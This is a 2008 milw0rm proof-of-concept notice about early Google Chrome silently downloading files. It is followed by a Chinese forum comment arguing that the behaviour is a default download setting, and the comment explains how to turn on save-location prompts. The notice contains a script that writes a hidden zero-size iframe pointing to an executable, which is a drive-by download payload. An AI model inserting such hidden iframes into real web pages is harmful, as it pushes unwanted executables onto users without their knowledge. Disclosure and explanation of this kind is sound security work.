************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
***********************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

以上内容说的是 Google Chrome 存在这样一个问题：
Google Chrome 可能在没有任何提示的情况下自动下载文件到使用者的计算机中。

经过实际测试，以上所说的内容不能算是通常理解上的漏洞，而属于一个下载设置的问题。按照 Google Chrome 的默认设置，下载文件前是并不会询问用户的，当用户点击下载链接后， Google Chrome 会将文件直接下载到设置中指定的目录，或许是 Google Chrome 为了让用户在使用中感觉到更多的便利，但与此同时却也带来了一些隐患和不便。



如果我们在 Google Chrome 的“选项”->“中级用户选项”中，将“下载前询问每个文件的保存位置”勾选，那么 Google Chrome 在下载文件前会弹出“另存为”窗口让用户选择保存位置。

最后编辑： 海色の月 编辑于2008/09/12 12:15